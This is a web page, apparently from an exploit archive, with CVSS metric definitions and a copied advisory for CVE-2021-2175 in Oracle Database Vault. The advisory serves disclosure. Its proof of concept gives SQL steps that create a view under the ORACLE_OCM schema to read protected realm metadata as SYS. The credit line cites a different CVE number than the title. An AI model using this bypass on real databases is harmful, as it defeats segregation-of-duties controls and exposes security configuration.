The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Oracle Database Vault Metadata Exposure
Title: CVE-2021-2175 Oracle Database Vault Metadata Exposure Vulnerability
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fixed
CVE Reference: CVE-2021-2175
Author of Advisory: Emad Al-Mousa
Overview:
Oracle database vault is a security feature that imposes segregation of duties such as account managemenet, authorization,....etc. So, in a nutshell a DBA/System Admin with access to "SYS" user has limited power in terms of data viewership, account creation,.....etc. The powers of SYS account are stripped down.
*****************************************
Vulnerability Details:
Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [Meta-data].
*****************************************
Proof of Concept (PoC):
The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance, such information SYS user by default has NO ACCESS to since it exposes what security measures of data protection is configured.
Access the database as SYS account:
sqlplus / as sysdba
SQL> SELECT * FROM DBA_DV_REALM;
ERROR at line 1:
ORA-01031: insufficient privileges
// as expected SYS account can't view the database view contents.....However...let us do the following:
SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;
SQL> select * from ORACLE_OCM.DUMMY_V;
// ORACLE_OCM account is misconfigured and was granted extra access to the view so when you create the view under it....you will be access the view content....and now you can see/view the vault realm policies are configured to protect what exactly within the database system.
*****************************************
References:
https://www.oracle.com/security-alerts/cpuapr2021.html
https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175
Credit:
Emad Al-Mousa: CVE-2021-35576
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum